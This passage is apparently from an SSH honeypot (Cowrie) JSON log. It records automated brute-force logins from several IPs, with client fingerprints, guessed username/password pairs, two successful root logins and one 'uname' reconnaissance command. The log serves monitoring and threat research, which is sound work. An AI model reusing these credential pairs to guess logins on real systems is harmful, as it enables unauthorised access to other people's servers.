rt-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:22:05.575586Z","src_ip":"83.168.105.65","session":"b4d7c932eb34"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:22:05.699684Z","src_ip":"83.168.105.65","session":"b4d7c932eb34"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:06.743020Z","src_ip":"83.168.105.65","session":"b4d7c932eb34"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:12.432434Z","src_ip":"212.227.125.160","session":"ec4fe29628d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55366,"dst_ip":"1.2.3.4","dst_port":22,"session":"b91d44c60058","protocol":"ssh","message":"New connection: 212.227.125.160:55366 (1.2.3.4:22) [session: b91d44c60058]","sensor":"my-vps","timestamp":"2025-08-26T12:22:16.157652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:16.158453Z","src_ip":"212.227.125.160","session":"b91d44c60058"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:22:16.209642Z","src_ip":"212.227.125.160","session":"b91d44c60058"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:22:16.363280Z","src_ip":"212.227.125.160","session":"b91d44c60058"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:17.416514Z","src_ip":"212.227.125.160","session":"b91d44c60058"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50694,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3615796b6d5","protocol":"ssh","message":"New connection: 217.72.205.35:50694 (1.2.3.4:22) [session: e3615796b6d5]","sensor":"my-vps","timestamp":"2025-08-26T12:22:17.996203Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:17.997324Z","src_ip":"217.72.205.35","session":"e3615796b6d5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53422,"dst_ip":"1.2.3.4","dst_port":22,"session":"330b0ff77a4c","protocol":"ssh","message":"New connection: 83.168.105.65:53422 (1.2.3.4:22) [session: 330b0ff77a4c]","sensor":"my-vps","timestamp":"2025-08-26T12:22:20.669905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:20.670861Z","src_ip":"83.168.105.65","session":"330b0ff77a4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:22:20.711218Z","src_ip":"83.168.105.65","session":"330b0ff77a4c"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-26T12:22:20.835261Z","src_ip":"83.168.105.65","session":"330b0ff77a4c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:21.878456Z","src_ip":"83.168.105.65","session":"330b0ff77a4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44592,"dst_ip":"1.2.3.4","dst_port":22,"session":"43638e7415b8","protocol":"ssh","message":"New connection: 212.227.235.229:44592 (1.2.3.4:22) [session: 43638e7415b8]","sensor":"my-vps","timestamp":"2025-08-26T12:22:24.468489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:25.013019Z","src_ip":"212.227.235.229","session":"43638e7415b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:22:25.014717Z","src_ip":"212.227.235.229","session":"43638e7415b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Meghdutt@123","message":"login attempt [root/Meghdutt@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:22:28.241201Z","src_ip":"212.227.235.229","session":"43638e7415b8"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:28.962041Z","src_ip":"212.227.235.229","session":"43638e7415b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52484,"dst_ip":"1.2.3.4","dst_port":22,"session":"0683bb09c069","protocol":"ssh","message":"New connection: 212.227.235.229:52484 (1.2.3.4:22) [session: 0683bb09c069]","sensor":"my-vps","timestamp":"2025-08-26T12:22:34.222573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:22:34.242129Z","src_ip":"212.227.235.229","session":"0683bb09c069"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:22:34.494652Z","src_ip":"212.227.235.229","session":"0683bb09c069"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":58678,"dst_ip":"1.2.3.4","dst_port":22,"session":"11cc60c87916","protocol":"ssh","message":"New connection: 83.168.105.65:58678 (1.2.3.4:22) [session: 11cc60c87916]","sensor":"my-vps","timestamp":"2025-08-26T12:22:35.839995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:35.840836Z","src_ip":"83.168.105.65","session":"11cc60c87916"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:22:35.879974Z","src_ip":"83.168.105.65","session":"11cc60c87916"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:22:35.999388Z","src_ip":"83.168.105.65","session":"11cc60c87916"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:37.040869Z","src_ip":"83.168.105.65","session":"11cc60c87916"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54286,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdcddc33b4a0","protocol":"ssh","message":"New connection: 83.168.105.65:54286 (1.2.3.4:22) [session: fdcddc33b4a0]","sensor":"my-vps","timestamp":"2025-08-26T12:22:50.904938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:50.905741Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:22:50.941980Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:22:51.052921Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:22:51.143584Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:22:51.144317Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:51.181965Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:51.183069Z","src_ip":"83.168.105.65","session":"fdcddc33b4a0"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":53452,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cfe5c3fe7a5","protocol":"ssh","message":"New connection: 93.123.109.189:53452 (1.2.3.4:22) [session: 2cfe5c3fe7a5]","sensor":"my-vps","timestamp":"2025-08-26T12:22:54.771964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:22:54.773164Z","src_ip":"93.123.109.189","session":"2cfe5c3fe7a5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:22:54.792434Z","src_ip":"93.123.109.189","session":"2cfe5c3fe7a5"}
{"eventid":"cowrie.login.failed","username":"pion","password":"pion","message":"login attempt [pion/pion] failed","sensor":"my-vps","timestamp":"2025-08-26T12:22:54.851771Z","src_ip":"93.123.109.189","session":"2cfe5c3fe7a5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:22:55.873122Z","src_ip":"93.123.109.189","session":"2cfe5c3fe7a5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54770,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d17500f6951","protocol":"ssh","message":"New connection: 83.168.105.65:54770 (1.2.3.4:22) [session: 1d17500f6951]","sensor":"my-vps","timestamp":"2025-08-26T12:23:06.066059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:23:06.066886Z","src_ip":"83.168.105.65","session":"1d17500f6951"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:23:06.103136Z","src_ip":"83.168.105.65","session":"1d17500f6951"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-26T12:23:06.214330Z","src_ip":"83.168.105.65","session":"1d17500f6951"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:23:07.253191Z","src_ip":"83.168.105.65","session":"1d17500f6951"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":59516,"dst_ip":"1.2.3.4","dst_port":22,"session":"002782c2cdbd","protocol":"ssh","message":"New connection: 83.168.105.65:59516 (1.2.3.4:22) [session: 002782c2cdbd]","sensor":"my-vps","timestamp":"2025-08-26T12:23:21.192641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:23:21.193661Z","src_ip":"83.168.105.65","session":"002782c2cdbd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:23:21.229177Z","src_ip":"83.168.105.65","session":"002782c2cdbd"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-26T12:23:21.337734Z","src_ip":"83.168.105.65","session":"002782c2cdbd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:23:22.375438Z","src_ip":"83.168.105.65","session":"002782c2cdbd"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48520,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ad87e62db91","protocol":"ssh","message":"New connection: 83.168.105.65:48520 (1.2.3.4:22) [session: 6ad87e62db91]","sensor":"my-vps","timestamp":"2025-08-26T12:23:36.279058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:23:36.280114Z","src_ip":"83.168.105.65","session":"6ad87e62db91"}
